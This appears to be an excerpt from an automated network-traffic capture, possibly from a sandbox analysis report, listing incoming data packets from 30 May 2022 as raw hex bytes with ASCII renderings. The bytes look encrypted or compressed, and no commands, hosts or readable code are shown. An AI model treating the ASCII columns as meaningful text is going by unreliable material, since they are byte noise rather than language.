2022-05-30 12:45:08 UTC	405	IN	Data Raw: ae b3 56 bb 33 ea 48 28 53 7e 07 20 88 04 de 93 a5 f2 58 6f 36 8d 73 3b 98 10 f3 7d d8 54 19 dd 4e a7 12 c9 99 52 d2 9d d0 f2 76 65 1c 15 e7 3e 32 05 34 9e 10 ba 0a eb 40 84 14 49 c6 4a ae 23 ff 8c 7e 08 34 4d f4 4a 70 d1 03 1c e7 4a 85 13 29 75 dd 3e f9 bb d5 39 b5 ef 1b bf 6c 49 bd ce 85 60 e5 13 76 53 93 eb 76 71 dd 46 f9 d8 ed 80 c6 e4 0d ed ca fa 50 6b e8 de 5d 4f b1 fa 1e b0 79 c6 c7 60 96 6f 37 dd 58 a2 b2 90 57 ee 1c c0 2e 55 17 17 f0 a7 a9 b5 11 48 35 c3 e8 22 38 ea fe 5d 67 62 4e 3f 31 dc d7 77 46 0c 3c 77 32 7b e6 c8 a5 15 4f 6d 31 7f 5d b5 06 4b b2 93 30 30 57 c1 79 d1 17 31 27 95 d3 d0 ca 72 18 fa 28 0a 42 17 07 ca c1 e0 41 fa 52 b5 f2 94 02 a8 ea f1 70 80 b9 9d 67 23 d5 46 49 d2 fe f7 fc e8 e6 70 61 1c a6 cf df a5 63 69 32 c7 ea 7f 37 22 c1 Data Ascii: V3H(S~ Xo6s;}TNRve>24@IJ#~4MJpJ)u>9lI`vSvqFPk]Oy`o7XW.UH5"8]gbN?1wF<w2{Om1]K00Wy1'r(BARpg#FIpaci27"
2022-05-30 12:45:08 UTC	406	IN	Data Raw: f2 3c 06 bf 4c bb 42 f7 f4 32 e8 26 18 80 94 fb a5 3f 9e a3 9f 15 e6 63 df a2 f1 f0 4e dd dc b1 1c ec fe 0f c5 52 ce 46 37 99 f9 6c 49 b5 48 fd e5 e7 0a ee c8 85 bd 14 d0 c5 65 4e 46 f5 20 7e 78 38 c9 b6 e9 22 a2 d5 c7 a6 45 8d 36 f8 de 01 22 a4 43 85 d0 54 d0 93 eb 82 60 de 74 bd e8 0f 66 f7 72 b8 d7 eb 0a 9e 94 84 80 9b 74 47 3b c2 43 89 45 d4 af 3c a0 c2 f4 ee 6e ee fa e0 d7 95 75 53 2a f5 15 42 58 98 70 45 c9 1a d3 38 19 48 2b ef 6b 3b 5f 68 5a c6 1e 91 0b ab f0 a8 c5 10 21 0f 60 ed 2a 0a 32 bc fe 5a b2 ad 58 ac 0d 0d 3a 20 b3 01 d2 df ee 9c ff fc 98 16 51 c9 76 78 10 5b cc 44 0d 4b 5c 5f f0 32 b8 79 54 06 dc a7 0c c1 42 d4 1a 1d d9 e8 9b 00 11 5e 31 a2 2b 31 83 83 74 1e 87 33 42 f8 a9 23 ae b3 56 bb 33 ea 48 28 53 7e 07 20 88 04 de 93 a5 f2 58 6f 36 Data Ascii: <LB2&?cNRF7lIHeNF ~x8"E6"CT`tfrtG;CE<nuSBXpE8H+k;_hZ!`2ZX: Qvx[DK\_2yTB^1+1t3B#V3H(S~ Xo6
2022-05-30 12:45:08 UTC	408	IN	Data Raw: fb 56 ab 8b b4 81 85 05 c7 84 ec 01 87 75 fc bb d4 fa c9 9c f9 f3 18 a8 c2 ef 3a 81 e3 e3 f8 77 d2 c2 27 0b e3 45 80 e6 5e 55 ca 9b 78 8e 7a 2b c2 1c 02 b7 f2 72 9b 75 dc b1 e0 ef 6f 7c 12 06 8a 84 15 1f 1f 14 8c 6e 58 51 b5 5e 73 b1 9c 2e 47 c9 db 3f 54 cb 01 b8 45 d0 75 bc 58 32 cc 12 ac fe 2e 6c 22 b6 22 3a bf 90 91 3e 73 c3 2a 1b 5e 9d 24 9b fd 86 5f 2c ca 55 24 b9 e2 b9 97 52 2c 56 f7 09 97 51 c1 c9 2e 97 4c 77 a0 7d 26 3b 03 a2 ae 6f bb da 49 c9 fb ac a7 93 5f 9f aa b1 78 da 9a 32 d1 ec 01 b8 a9 2b 62 f9 f2 96 cd 2e fe bb 4d 09 c8 b3 61 2d 8b 24 e4 3a 5c 44 56 eb ae 33 1d 4c a6 84 7f 0b 81 bb e3 94 60 17 35 c5 8a 38 a2 05 07 02 3a 7f 2f 64 57 64 77 ed 7f 25 69 fe 4e 8c cd 0c f7 61 39 68 b3 04 36 fa 0e 8b 71 c7 cd 02 ae 10 2f f4 90 fb d1 49 9d a7 ed Data Ascii: Vu:w'E^Uxz+ruo\|nXQ^s.G?TEuX2.l"":>s*^$_,U$R,VQ.Lw}&;oI_x2+b.Ma-$:\DV3L`58:/dWdw%iNa9h6q/I
2022-05-30 12:45:08 UTC	409	IN	Data Raw: 4e 72 0b b2 0c 36 97 45 5a a1 0c c3 55 6f 33 9b 78 bf fd 93 7f f3 d8 5d f9 2a 0f fb 88 c6 60 e5 13 76 53 93 eb 76 71 dd 46 f9 d8 ed 80 c6 e4 0d ed ca fa 50 6b dc 98 18 7c 85 c8 5b 82 3f 83 f6 21 a1 29 0e 9f 60 e7 f7 a7 12 ac 28 81 19 16 27 51 c9 e2 98 83 23 0a 76 86 db 11 0d dd c8 1f 54 53 7b 7a 72 99 94 35 04 3a 08 47 04 43 d5 ff e7 53 7a 5c 77 4a 5d b5 06 4b b2 93 01 73 6e f6 3b 94 51 72 12 a1 91 94 fd 33 20 b8 1e 3f 03 54 41 f2 f8 a6 79 cb 16 81 b6 a0 43 ec a9 c4 46 b5 ff dc 53 16 d5 46 49 d2 fe f7 fc e8 e6 70 61 1c a6 cf df a5 63 69 32 c7 ea 7f 37 08 47 b2 42 be 9d 64 ee 1c 4a 74 59 47 b9 ed 30 c8 5a 7d 99 fc 69 72 9e 89 b6 fb f4 3c 01 3d 0a ec 94 cb 7f 21 39 f5 80 24 26 df b5 6a 3d 59 ac fb 56 ab 8b b4 f0 85 05 c7 84 ec 01 87 75 fc bb d4 84 bf ea 8f Data Ascii: Nr6EZUo3x]*`vSvqFPk\|[?!)`('Q#vTS{zr5:GCSz\wJ]Ksn;Qr3 ?TAyCFSFIpaci27GBdJtYG0Z}ir<=!9$&j=YVu
2022-05-30 12:45:08 UTC	410	IN	Data Raw: f0 af 64 e4 93 81 e0 03 cb 70 be 98 47 64 e2 05 c3 96 12 96 d5 ad c4 26 98 32 fb ae 49 20 b1 34 fe 91 ad 49 9e 94 b1 b1 a2 41 74 7e 80 7a bf 74 ec ea 0d e3 fb b5 df 28 d7 c8 d9 96 a7 44 25 2b 8e 11 38 54 99 06 46 cf 63 a5 3d 6f 47 2f e9 18 32 57 1b 2c b3 1d 95 0a dd 8b ae b5 1d 2f 05 17 ec 58 7b 42 bd f6 5a b4 a1 5a a5 05 0f 03 15 82 44 91 e8 ab a5 cc cb da 27 67 fc 44 3b 20 19 88 77 4f 09 6d 1d b6 02 8f 4a 61 31 ef e3 4a f9 7a e7 5e 2f 9a db af 46 20 1b 77 96 1e 00 c5 c7 40 28 c5 06 72 cb ef 13 9e b3 56 bb 02 ac 0e 6e 15 38 41 66 ce 42 98 d5 e3 b4 1e 29 70 cb 35 7d de 56 b5 3b 9e 12 5f 9b 08 e1 54 8f df 14 94 db 96 b4 30 23 5a 53 a1 78 74 43 72 d8 56 fc 4c ad 06 84 14 49 c6 4a ae 23 ff 8c 7e 08 34 4d f3 39 07 af 73 62 96 34 f0 17 29 01 dd 41 89 cb d1 48 Data Ascii: dpGd&2I 4IAt~zt(D%+8TFc=oG/2W,/X{BZZD'gD; wOmJa1Jz^/F w@(rVn8AfB)p5}V;_T0#ZSxtCrVLIJ#~4M9sb4)AH
2022-05-30 12:45:08 UTC	412	IN	Data Raw: 1f 1f 14 8c 6e 58 51 b5 5e 73 b1 9c 2e 47 c9 db 3f 54 cb 01 b8 45 d0 75 bc 58 32 cc 12 ac fe 2e 6c 22 b6 22 3a bf 90 91 3e 73 c3 2a 1b 5e 9d 12 d9 cd b7 69 6f f9 17 60 fa a4 88 af 6b 18 67 b3 39 d3 67 f4 fd 17 a5 7d 43 97 48 65 7a 34 93 ef 56 ff 98 7b 8f b9 9e 90 d7 6e db 99 86 4f e3 ac 03 e9 d9 42 8a 90 1f 50 ba c2 d7 cd 2e fe bb 4d 09 c8 b3 61 2d 8b 24 e4 3a 5c 44 56 eb ae 33 1d 4c a6 84 7f 43 fb fd e3 94 60 17 35 c7 8a 38 a2 06 07 02 3a 7a 2f 64 57 63 77 ed 7f 2e 69 fe 4e 81 cd 0c f7 70 39 68 b3 17 36 fa 0e 9c 71 c7 cd 1f ae 10 2f dc d6 bd 97 2a db e1 ab 0f a7 52 e7 b1 c1 c0 08 c6 9a f7 2c 98 b8 4b fd 5b 88 00 06 94 c8 5e 49 f6 48 fd e5 a0 0a ee c8 cc bd 14 d0 8a 65 4e 46 a6 20 7e 78 61 c9 b6 e9 43 a2 d5 c7 c3 45 8d 36 9f de 01 22 cf 43 85 d0 39 d0 93 Data Ascii: nXQ^s.G?TEuX2.l"":>s^io`kg9g}CHez4V{nOBP.Ma-$:\DV3LC`58:z/dWcw.iNp9h6q/R,K[^IHeNF ~xaCE6"C9
2022-05-30 12:45:08 UTC	413	IN	Data Raw: 0e 61 db 71 d1 a6 64 99 f8 de a8 13 9a fc fa 13 01 58 79 77 5f d0 a6 65 d8 fe 39 5d 22 2c cf d6 62 84 72 1e c6 86 9f f8 18 09 40 eb fc 84 15 f2 bb 7b 97 dd d5 aa d2 50 5a ea 9d b6 89 f6 d3 16 c3 d4 81 f4 1d 37 7d 1b 9d c0 54 f1 3c 81 5e d5 ab 73 ce 8c 1c 56 e5 2f f3 55 fd f0 86 0b 6c c6 1d b8 98 c3 4e ce ef ee 64 fa be f1 f4 40 de 24 42 da cc 7a 29 3c d0 b5 79 87 37 e0 45 76 da c2 93 ad b5 a6 ce 2c 94 7f 45 94 32 e1 cd 24 ba 64 d2 e1 11 20 cc 8c 88 65 42 1a c4 8c 65 2e 6b b5 34 db a0 38 b6 3d 7f 2c 12 6c 7d df 62 f2 b7 48 35 ae 60 1e 37 54 3b a9 70 c8 73 e5 a0 22 82 09 38 2e 25 4e d4 e4 69 ec d5 80 e7 dc 5d 81 d3 5a 9d 7a cd 1a 92 62 96 1e c1 8f 2e 0e 2d 59 cc fc e2 38 20 c3 87 19 be 09 96 10 e5 ce c9 5a ae 29 60 3f 3e 6b 41 a7 5d b2 24 3f eb 84 ba f8 66 Data Ascii: aqdXyw_e9]",br@{PZ7}T<^sV/UlNd@$Bz)<y7Ev,E2$d eBe.k48=,l}bH5`7T;ps"8.%Ni]Zzb.-Y8 Z)`?>kA]$?f
2022-05-30 12:45:08 UTC	414	IN	Data Raw: 08 ad 5b 03 eb 22 f0 79 4b 70 32 dc 30 0b 1e 59 7a 82 4f d3 39 9f b3 ec c5 6c 45 6c 6a 95 44 3d 2f 8d e5 1f 85 94 6c 94 4c 3c 54 20 d4 01 d2 df 87 9c 92 fc f9 16 36 c9 13 78 3f 5b bc 44 63 4b 3b 5f f0 32 dc 79 35 06 a8 a7 0c c1 35 d4 74 1d bd e8 c4 00 34 5e 01 a2 1f 31 ea 83 51 1e b7 33 70 f8 c0 23 8b b3 66 bb 01 ea 21 28 0c 7e 22 20 b8 04 ec 93 cc f2 7d 6f 06 8d 41 3b f1 10 d6 7d e8 54 2b dd 27 a7 12 c9 ed 52 bb 9d bd f2 13 65 43 15 c2 3e 02 05 00 9e 79 ba 2f eb 70 c2 60 0f e9 0c cd 65 89 ca 0a 4e 1b 0b ed 0c 13 97 75 5a 93 0c aa 55 4a 33 ab 78 8d fd fa 7f d6 d8 6d f9 18 0f 92 88 c6 60 e5 13 ce 1c d2 eb 6c 21 9c 46 f0 d8 ed 80 a7 88 6c 9f a7 d4 27 0a 9e de 5d 4f b0 fa 1e b0 38 aa a6 12 fb 4f 43 af 31 c5 d5 f5 25 8b 78 c0 2e 55 17 17 d0 a7 c8 b5 7d 48 5c Data Ascii: ["yKp20YzO9lEljD=/lL<T 6x?[DcK;_2y55t4^1Q3p#f!(~" }oA;}T+'ReC>y/p`eNuZUJ3xm`l!Fl']O8OC1%x.U}H\
2022-05-30 12:45:08 UTC	415	IN	Data Raw: bc dd 47 e4 2f 02 da 0d 31 3f 66 c0 c2 7b d2 b5 56 8f b9 9e bd fa 43 f6 b4 c3 01 a7 8c 47 a1 f9 12 cb c2 5e 1d ff 96 92 9f 7d d3 96 60 24 e5 b3 4c 00 a6 09 c9 78 19 03 1f a5 8e 6b 28 7c 9f a4 3c 59 cd 96 ce b9 4d 3a 35 c5 8a 38 8f 28 2a 2f 17 3a 61 20 77 3c 42 dd 46 05 2a ac 02 a1 e0 21 da 4c 39 68 9e 29 1b d7 23 c9 34 80 84 4c 8e 42 7c 82 f6 ed c5 46 8d a0 ff 63 87 19 a2 c3 ec ed 25 c4 b7 f7 01 80 95 66 d0 25 c6 44 26 fb 9b 1f 69 e5 1a b4 b3 a6 5e ab e8 ce f8 4d fd e8 48 63 6b f5 20 7e 55 15 e4 9b c4 60 e7 92 8e e8 65 dd 64 b1 88 40 76 e1 63 ce 95 0d fd be c6 af 4d de 59 90 c5 22 4b b2 3c fc f7 bb 58 d7 c2 c5 d4 de 54 0c 7e 9b 6e a4 68 f9 82 3c a0 c2 d9 c3 43 c3 d7 a2 92 d2 3c 2a 3b 89 69 43 33 f4 66 57 cf 66 b7 29 7c 39 4b 9d 0e 4e 4e 12 5a db 05 fe 14 Data Ascii: G/1?f{VCG^}`$Lxk(\|<YM:58(/:a w<BF!L9h)#4LB\|Fc%f%D&i^MHck ~U`ed@vcMY"K<XT~nh<C<*;iC3fWf)\|9KNNZ
2022-05-30 12:45:08 UTC	417	IN	Data Raw: 94 fd 33 20 b8 1e 3f 03 08 fb b4 f8 2a 04 8d 16 81 b6 a0 43 ec a9 c4 46 b7 ff dc 53 8a a8 00 49 7a 83 b1 fc 28 9a 36 61 1c a6 cf df f9 d9 2f 32 c6 ea 7f 37 22 c1 fa 8c 7c 61 9a 16 1c 4a 7c 59 07 b9 e3 32 44 27 3a 99 fc 69 42 9e 89 b6 f4 f4 3c 01 6e 4f d3 7e be 47 cd 16 82 80 24 26 df b5 6a 3d 1f ea be 10 ed cd 1a cb 85 43 79 bf ec 47 69 4e fc fd 52 be bf ac c9 c3 28 98 8e 65 4c b1 d1 d4 be 31 94 84 61 4d 5a fc 39 5f 1d 55 ca 9b 38 8e 7a 2b 1a 61 44 b7 f2 72 9b 75 dc b1 e0 ef 6f 7c 12 06 16 3e 53 1f 37 6a ca 6e 58 51 b5 5e 73 b1 9c 2e 44 c9 db 3f 6c b5 47 b8 0d ae 33 bc f0 4f 8a 12 6c 82 68 6c 22 b6 22 3a 23 2a d7 3e 71 c3 2a 1b 5e 9d 12 d9 32 48 96 90 f9 17 60 fa e4 88 af 6b 30 19 f5 39 d3 67 f4 fd 17 a5 7d 43 97 48 65 7a 28 2f a9 56 87 e6 3d 8f b9 9e 90 Data Ascii: 3 ?CFSIz(6a/27"\|aJ\|Y2D':iB<nO~G$&j=CyGiNR(eL1aMZ9_U8z+aDruo\|>S7jnXQ^s.D?lG3Olhl"":#>q*^2H`k09g}CHez(/V=
2022-05-30 12:45:08 UTC	417	IN	Data Raw: a7 f7 00 0c 70 08 74 7b 3a b6 e3 15 c7 12 77 7f 5d b5 06 4b f6 28 47 73 6d f6 3b 94 51 72 12 a1 6e 6b 02 cc 20 b8 1e 3f 43 54 41 f2 b4 26 3f cb 16 81 b6 a0 43 ec a9 c4 46 b5 ff dc 37 ad 93 46 e9 52 b8 f7 fc e8 e6 70 60 1c a6 cf db a5 63 69 82 47 ac 7f f3 a2 87 fa c0 fc d8 65 35 62 0c 7c d1 38 ff e3 32 c8 5a 7c fd 47 2f 42 9d 89 b6 f4 f4 3c 01 6e b0 50 3b 07 47 15 6b c4 c0 24 26 df 15 ea 7b 1f ea bd 10 ed cd f2 b6 c3 43 81 c2 aa c3 7a 75 ba 09 12 84 f9 ac c9 c3 28 99 f2 df 0a b4 d3 d4 be 35 15 c2 61 51 24 45 c6 64 9d 13 ca d7 07 c8 7a f7 bc 5a 02 3f 8d 34 9b 75 dc b1 e0 6b d4 3a 12 02 8a 84 15 1f 1f 14 8c 91 a7 ae 4a 5e 73 b1 9c 6e 47 c9 db cb d4 8d 01 b8 45 d0 75 bc 58 32 cc 12 ac fe 2e cc 99 f0 22 76 3e d6 91 3e 73 c3 2a 1a 5e 9d 12 dc cd b7 69 33 78 51 Data Ascii: pt{:w]K(Gsm;Qrnk ?CTA&?CF7FRp`ciGe5b\|82Z\|G/B<nP;Gk$&{Czu(5aQ$EdzZ?4uk:J^snGEuX2."v>>s*^i3xQ
2022-05-30 12:45:08 UTC	419	IN	Data Raw: ae 3b f7 94 d4 28 3a 3c 0e 12 b3 01 fc bd 9d ef ff fc 98 16 51 39 70 78 14 5b cc 44 23 3f 30 2c f0 32 b8 79 50 f6 da a7 08 c1 42 d4 34 69 b5 9b bf 00 11 5e 39 52 2d 31 82 83 74 1e a9 47 2e 8b 8d 79 f4 e9 56 bb 33 ea 48 28 54 7e c7 20 88 04 f0 f4 c3 9b 3c 1c 12 f5 73 3b 98 10 33 7d df 54 69 dc 4e a7 3c ae ff 3b b6 ee f4 8b 76 65 1c 15 e7 2e 35 05 04 9f 10 ba 24 99 33 b0 31 2b b0 3d e8 65 b9 ca 08 5f 75 0b 32 48 36 97 6b 28 d2 7e a0 71 5f 01 9b 78 bf fd 93 7f f3 d8 5d f9 2a 0f fb 88 c6 60 e5 13 76 53 93 eb 76 71 ff 43 6a c1 ef 80 c6 e4 49 6b 8c fa 51 6b e8 de 09 c9 f7 fa 1e b0 79 c6 c7 60 96 6f 37 dd 58 a2 b2 90 57 ee e3 3f d1 aa 17 17 f0 a7 56 4a ee b7 35 c3 e8 22 38 ea fe 5d 67 62 4e 3f 30 dc d7 77 47 0c 3c 77 5a fd a0 c8 a5 15 4f 6d 31 7f 5d b5 06 4b b2 Data Ascii: ;(:<Q9px[D#?0,2yPB4i^9R-1tG.yV3H(T~ <s;3}TiN<;ve.5$31+=e_u2H6k(~q_x]*`vSvqCjIkQky`o7XW?VJ5"8]gbN?0wG<wZOm1]K
2022-05-30 12:45:08 UTC	420	IN	Data Raw: 91 1f 50 ba c3 d7 cd 2e 66 31 0b 09 c8 b3 61 2d 8b 24 e4 3a 5c 44 56 eb 34 7f 5c 4c 84 81 ec 12 83 bb e3 94 ac 9d 73 c5 8b 38 a2 05 db 88 7c 7f 2f 64 57 64 77 ed 7f 25 69 fe 4e 8c cd 0c f7 61 c6 97 4c fb 36 fa 0e 8b 8e 38 32 fd ae 10 2f c3 d6 bd 97 0f db e1 ab 26 a6 52 e7 9a c0 c0 08 e9 6a 7d 6a ad b8 4b fd 60 88 00 06 a9 c8 5e 49 b5 02 9a a4 e7 28 eb 5b 9c bf 14 d0 c5 41 c5 00 f5 21 7e 78 38 fd 3d af 22 a2 d5 c7 a6 45 8d 36 f8 de 01 22 a4 43 85 d0 54 2f 6c 14 7d 60 de 74 bd 17 f0 99 08 72 b8 d7 eb 0a 9e 94 84 80 9b 74 47 3a c2 43 89 44 d4 af 3c e8 49 b2 ee 6e ee fa e0 d7 95 75 64 1b cc 27 00 b8 3f 77 03 a8 27 04 60 2c 70 1d dc 26 80 28 59 1e 82 28 d3 b5 14 f5 ec 81 25 16 3c 26 d4 1d 3d 73 8d cf 1f 85 94 6c 94 c3 c3 c5 df b3 01 d2 df 11 63 00 03 98 16 51 Data Ascii: P.f1a-$:\DV4\Ls8\|/dWdw%iNaL682/&Rj}jK`^I([A!~x8="E6"CT/l}`trtG:CD<Inud'?w'`,p&(Y(%<&=slcQ
2022-05-30 12:45:08 UTC	421	IN	Data Raw: f7 fc e8 e6 a4 9e e3 59 cf df a5 63 97 cd 38 15 7f 37 22 c1 71 09 c0 9e 65 e9 1c 4a 82 a6 b8 46 e3 32 c8 5a a8 66 03 96 42 9e 89 b6 0a 0b c3 fe 6e 4f af c4 73 cb 56 6b c4 80 24 26 21 4a 95 c2 1f ea bd 10 39 32 0d 49 c3 43 81 c2 54 b8 3e cc ba fd 92 c2 8b 22 8a c3 28 98 f2 df f4 4e 2c 2b be 31 94 84 a5 b2 5a fc c6 a0 1d 55 34 64 87 71 7a 2b c2 1c 19 39 b1 72 9b 75 dc b1 e0 ef 6f 7c fc 8b c9 84 eb e0 e0 eb 8c 6e 58 51 65 a1 8c 4e 9c 2e 47 c9 25 c0 ab 34 01 b8 45 d0 1c 33 1b 32 cc 12 ac fe d0 93 dd 49 22 3a bf 90 41 c1 8c 3c 2a 1b 5e 9d ec 26 32 48 69 6f f9 17 a9 6a e7 88 af 6b 18 67 4d c6 2c 98 f4 fd 17 a5 a9 bc 68 b7 65 7a 34 93 11 a9 00 67 7b 8f b9 9e 3a 45 2d db 99 86 4f e3 52 fc 16 26 42 8a 90 1f 84 45 3d 28 cd 2e fe bb b3 f6 37 4c 61 2d 8b 24 c5 ac 1f Data Ascii: Yc87"qeJF2ZfBnOsVk$&!J92ICT>"(N,+1ZU4dqz+9ruo\|nXQeN.G%4E32I":A<*^&2HiojkgM,hez4g{:E-OR&BE=(.7La-$
2022-05-30 12:45:08 UTC	422	IN	Data Raw: b3 56 bb 33 14 b7 d7 ac 7e 07 20 88 c4 66 d7 a5 f2 58 6f 36 73 8c c4 67 10 f3 7d d8 80 e6 22 b1 a7 12 c9 99 ac 2d 62 2f f2 76 65 1c 06 51 7a 32 05 34 9e 10 44 f5 14 bf c2 52 0f 80 c8 17 9a 46 ca 38 4e 72 f5 4d f3 c9 97 45 5a a1 87 7e 11 6f 33 9b 78 bf 03 6c 80 0c d8 5d f9 2a c3 04 77 39 60 e5 13 76 ad 6c 14 89 71 dd 46 f9 47 56 c4 c6 e4 0d ed ca 04 af 94 17 de 5d 4f b1 2e e1 4f 86 c6 c7 60 96 91 c8 22 a7 a2 b2 90 57 e8 d3 84 2e 55 17 17 f0 59 56 4a ee 48 35 c3 e8 fa c7 15 01 5d 67 62 4e c1 ce 23 28 7a b4 48 3c 5e c0 3f e6 c8 a5 15 4f 93 ce 80 a2 b5 06 4b b2 43 fe 8c 91 f6 3b 94 51 8c ed 5e 6e 94 fd 33 20 02 11 7a 03 54 41 f2 f8 58 86 34 e9 81 b6 a0 43 34 56 3b b9 b5 ff dc 53 e8 2a b9 b6 0b d2 b2 fc 04 ca 35 61 1d a6 cf df 11 f6 2f 32 c6 ea 7f 37 ce 7a bc Data Ascii: V3~ fXo6sg}"-b/veQz24DRF8NrMEZ~o3xl]w9`vlqFGV]O.O`"W.UYVJH5]gbN#(zH<^?OKC;Q^n3 zTAX4C4V;S5a/27z
2022-05-30 12:45:08 UTC	424	IN	Data Raw: 34 9b fc 0e 95 dc c1 cd 16 03 16 2f c5 7b bb 97 1b 44 e7 ab 20 38 54 e7 70 5f c6 08 33 04 f1 2c 65 26 4d fd da 16 06 06 01 56 58 49 d5 d4 fb e5 7f 94 e8 c8 07 23 12 d0 ab fb 48 46 af be 78 78 76 57 b0 e9 18 3c d3 c7 86 db 8b 36 ea 40 07 22 58 de 83 d0 a4 4d 95 eb 66 fd d8 74 69 75 09 66 33 ef be d7 5f 97 98 94 26 1d 9d 74 d3 a6 c4 43 0b d8 d2 af 4e 3d c4 f4 8a f3 e8 fa b0 4a 93 75 20 86 ca 27 38 fc ab 36 29 17 24 97 63 b3 76 1d d6 c7 0d 6e a3 83 84 28 3d a5 99 b3 32 1d 23 16 f4 ba d2 1d fd ef 8b cf b5 19 92 6c 08 a0 3a 3a ae 2f 07 d2 5f 72 9a ff 88 04 10 51 ab d4 7e 10 a3 60 42 0d a7 f0 59 f0 f6 14 7f 54 a8 70 a1 0c 5f ee d2 1a 93 75 ee 9b 78 bd 58 31 c0 87 37 83 cb d8 18 87 01 ee fe a9 35 02 b5 56 bf 9f ec 48 ce f8 78 07 ea 23 02 de 25 0e f4 58 cd 9d 8b Data Ascii: 4/{D 8Tp_3,e&MVXI#HFxxvW<6@"XMftiuf3_&tCN=Ju '86)$cvn(=2#l::/_rQ~`BYTp_uxX175VHx#%X
2022-05-30 12:45:08 UTC	425	IN	Data Raw: 55 95 bd 93 d8 a7 06 ef b4 c3 35 ae 5d d7 98 fc b6 aa d8 bb aa 46 ff 81 9e 0a 62 d3 90 db 5d f1 f0 04 0b cc 6f a3 e1 1d 20 ca d8 17 fe 03 6d ab 70 67 e0 f2 e9 9b 36 ae d4 81 9b 0a 31 67 72 ef fc 54 1f 1f 10 8e 29 3d 25 f9 31 10 d0 f0 4b 0e a7 bd 50 15 cb 01 06 45 93 07 d9 39 46 a9 46 c3 91 42 04 47 da 52 09 8d c3 ff 5f 03 b0 42 74 2a 9d 12 a5 ce f8 19 0a 97 5a 15 8e c1 f0 ee 6b 18 ff b0 69 a1 08 97 98 64 d6 4e 71 d9 2d 1d 0e 63 93 ef 6a fc d4 14 ee dd d2 f9 b5 1c ba eb ff 0e e3 ac 95 ea 89 30 e5 f3 7a 23 c9 f1 e5 8b 47 8c c8 39 5e c8 f6 63 6a ee 50 b4 48 33 27 17 8f ca 41 78 3f d5 84 7f e4 85 ed 8a e6 14 62 54 a9 da 4a cd 71 62 61 4e 7f 2f 17 53 37 12 99 33 44 1a 8a 0b fe bf 63 85 61 39 84 b7 52 5f 88 7a fe 10 ab 8b 70 cb 75 2f 2a d2 eb fe 7d af 94 ca 4a Data Ascii: U5]Fb]o mpg61grT)=%1KPE9FFBGR_BtZkidNq-cj0z#G9^cjPH3'Ax?bTJqbaN/S73Dca9R_zpu/}J
2022-05-30 12:45:08 UTC	426	IN	Data Raw: 06 6a c6 69 36 97 59 5a e2 6d af 39 21 56 e3 0c f7 92 fc 14 b6 a0 5d f9 6a 0e bc ed b2 2b 80 6a 14 3c f2 99 12 3d bc 3f 96 ad 99 ce a7 89 68 ac ca fa 6d 6a af bb 29 04 d4 83 4d c4 18 b2 a2 60 34 6e 70 b8 2c f5 db fe 33 81 6b 94 4b 2d 63 5b 95 c9 ce c1 79 1f 35 c3 4c 23 7f 8f 8a 0a 0e 0c 2a 50 46 88 bf 05 23 6d 58 27 40 14 85 ad d6 66 06 09 31 7f ce b7 55 2e c6 d5 6e 01 0b 91 49 fb 24 1c 76 f6 f8 fa 99 5c 57 b8 98 3d 50 31 35 b1 94 cf 09 a9 79 e0 c4 c4 07 8d dd a5 46 b5 0d dc 16 78 a0 2b 1e bb 90 93 93 9f 95 70 94 1c e3 b7 b6 d1 34 00 5c a3 85 08 44 67 b9 fa 59 83 db 08 99 68 33 3f 35 2e c9 81 5d a9 28 18 99 fc b6 40 cd e1 d9 83 a3 55 6f 0a 20 d8 c4 f8 8c 17 38 a1 f4 73 4f b1 d1 05 4a 4b 8f c5 64 ba cd f2 a3 c1 0e e4 b1 d9 26 a6 56 f8 92 ea 95 f9 4c c8 8a Data Ascii: ji6YZm9!V]j+j<=?hmj)M`4np,3kK-c[y5L#*PF#mX'@f1U.nI$v\W=P15yFx+p4\DgYh3?5.](@Uo 8sOJKd&VL
2022-05-30 12:45:08 UTC	428	IN	Data Raw: ba 4a c7 b9 ab e3 3d e8 55 8d aa 64 75 a4 63 84 83 3c b5 ff 87 c7 18 bb 17 c8 9c 6a 23 8f 33 b8 fb ea 59 f6 f1 e8 ec c4 3a 28 4f ab 25 f0 0c b7 c0 52 e1 c2 d3 ee 2b 96 8e 92 b6 f6 01 2d 78 a3 49 41 61 ad 65 4b cf 6e db 4a 1c 5e 79 b0 36 0b 25 58 4c f6 5a 87 56 d6 dd 98 c0 25 53 3c 76 b5 69 55 35 e4 a3 7a c0 ec 05 e7 48 4f 6d 20 f7 01 82 be 9a f4 b9 95 f4 73 14 b1 1f 0b 64 28 8d 44 5e 03 10 08 b1 62 f1 57 30 6a b0 a7 9b c1 35 b5 6c 78 90 86 da 64 75 1c 44 c4 4d 54 f1 83 d0 1e f0 52 34 9d e0 4d fd c7 37 c9 47 ea e9 28 24 1f 71 45 c1 6a 91 e3 c0 9c 58 6f 90 8d 04 5a ee 75 ba 13 8d 3a 69 af 2b d7 73 bb fc 1a b7 fc b4 97 04 65 be 15 90 5f 44 60 7d f0 40 c8 6f 9b 21 b0 37 47 e5 6d 8c 00 cb ca 9d 4e 05 6a c4 69 7f f9 16 2e ce 7c c3 55 f7 33 ec 19 c9 98 da 11 b0 Data Ascii: J=Uduc<j#3Y:(O%R+-xIAaeKnJ^y6%XLZV%S<viU5zHOm sd(D^bW0j5lxduDMTR4M7G($qEjXoZu:i+se_D`}@o!7GmNji.\|U3
2022-05-30 12:45:08 UTC	429	IN	Data Raw: 1f 14 83 6f 1d 3f c0 33 20 c8 ef 5a 22 a4 97 50 37 aa 6d dd 36 87 75 bc c0 30 8b 77 d8 aa 47 01 47 ec 4d 54 da d9 ff 58 1c b1 47 7a 2a f4 7d b7 cd b7 9a 6e be 72 14 bc cd e4 ca 3f 61 17 d6 39 84 66 b2 91 62 d6 15 05 fe 24 00 38 41 f5 89 33 8d eb 7b 8f 23 9f d7 b2 1a 98 f6 e8 3c 8c c0 66 aa 89 42 8a 3c 1e 17 df b6 94 a2 40 8d d4 21 6c 85 dc 05 48 8b 24 5a 39 0e 21 37 8f ed 5c 73 3f c9 e8 1a 5c 81 bb d0 95 26 7e 5b a1 cc 51 d0 76 73 44 53 13 4a 21 2f 25 77 ed 75 26 20 8d 18 ed a1 65 93 22 56 0c d6 54 57 9d 6b 8b 46 c5 8a 67 da 5f 6a 8e 95 ed 97 0f 5d e0 ec 43 d3 11 88 f7 ac a1 66 8d d6 9e 42 c8 f9 4b 7a 61 cf 65 72 ea a7 33 24 d4 26 99 a9 8e 64 8b 9f 85 67 15 97 a0 11 0b 28 83 49 0c 17 56 a4 d3 87 56 f1 a1 b5 cf 2b ea 45 af de 01 43 a5 05 f7 b5 31 95 fd 9d Data Ascii: o?3 